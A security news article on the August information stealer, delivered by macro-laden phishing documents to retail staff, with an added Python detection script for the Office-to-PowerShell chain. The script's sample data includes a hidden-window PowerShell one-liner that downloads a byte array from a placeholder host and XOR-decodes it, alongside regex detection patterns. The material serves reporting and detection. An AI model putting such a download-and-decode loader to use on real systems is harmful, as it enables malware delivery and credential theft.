In keeping with the trend of PowerShell seeing greater use as an attack mechanism, a new information-stealing piece of malware is using it to advance its attack, researchers said.
The malware — called August — is going out via TA530, an attack that focuses on highly personalized campaigns.
In this case, the August distribution campaign was targeting customer service and managerial staff at retailers in an attempt to steal credentials and sensitive documents from the compromised machines, said researchers at Proofpoint.
To ensure successful infection, the attacker used email subject lines that referenced issues with purchases from the targeted company’s website. These emails were aimed at employees who could supposedly help resolve the problems, making it likely they would open the attached documents, which purportedly contained detailed information about the issue.
However, as soon as the recipient opened the document, they would be prompted to enable macros, which in turn would launch a PowerShell command to download and install the August stealer on the machine. The malicious payload is downloaded from a remote site as a PowerShell byte array, along with a few lines of code that deobfuscate the array through an XOR operation.
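The chain described above (Office macro spawns PowerShell, which fetches a byte array and XORs it) leaves a recognisable footprint in process-creation and script-block logs. The following triage script is an added example, not code from Proofpoint or the article; it runs over constructed pipe-separated events (parent image, image, command line) and the field format, sample values and placeholder URL are assumptions.

```python
import re

# Heuristics for the behaviour described in the article: a PowerShell command that
# pulls a byte array from a remote site and deobfuscates it with -bxor.
INDICATORS = {
    "byte_array": re.compile(r"\[byte\[\]\]", re.I),
    "xor": re.compile(r"-bxor\b", re.I),
    "download": re.compile(r"DownloadData|DownloadString|Invoke-WebRequest|Net\.WebClient", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b", re.I),
}
OFFICE_PARENTS = ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE")

# Constructed sample events (not real telemetry): parent image | image | command line.
SAMPLE_EVENTS = [
    r"C:\Program Files\Microsoft Office\WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r"powershell -nop -w hidden -c $b=(New-Object Net.WebClient).DownloadData('http://PLACEHOLDER.invalid/a');"
    r"$p=[byte[]]($b|%{$_ -bxor 0x5A})",
    r"C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r"powershell -File C:\scripts\backup.ps1",
    r"C:\Program Files\Microsoft Office\EXCEL.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r"powershell -c Get-Date",
]

def parse_event(line):
    """Split one constructed event into its three fields (command line may contain '|')."""
    parent, image, cmdline = line.split("|", 2)
    return {"parent": parent, "image": image, "cmdline": cmdline}

def triage(line):
    """Return (verdict, reasons) for one event: high / medium / low."""
    ev = parse_event(line)
    reasons = []
    # An Office application launching PowerShell is the macro-to-PowerShell pivot itself.
    if ev["parent"].upper().endswith(OFFICE_PARENTS) and ev["image"].lower().endswith("powershell.exe"):
        reasons.append("office_spawned_powershell")
    for name, rx in INDICATORS.items():
        if rx.search(ev["cmdline"]):
            reasons.append(name)
    if "office_spawned_powershell" in reasons and {"byte_array", "xor", "download"} <= set(reasons):
        return "high", reasons          # full download-then-XOR pattern under an Office parent
    if "office_spawned_powershell" in reasons or len(reasons) >= 2:
        return "medium", reasons        # worth an analyst's look
    return "low", reasons

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        verdict, reasons = triage(event)
        print(verdict, reasons)
```

In production the same checks map onto Sysmon Event ID 1 (parent/child) and PowerShell script-block logging (Event ID 4104), where the decoded command text is visible even when the launcher was obfuscated.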
The security researchers said in a blog post that the macros used in this campaign are similar to those used in a campaign delivering the Ursnif banking Trojan.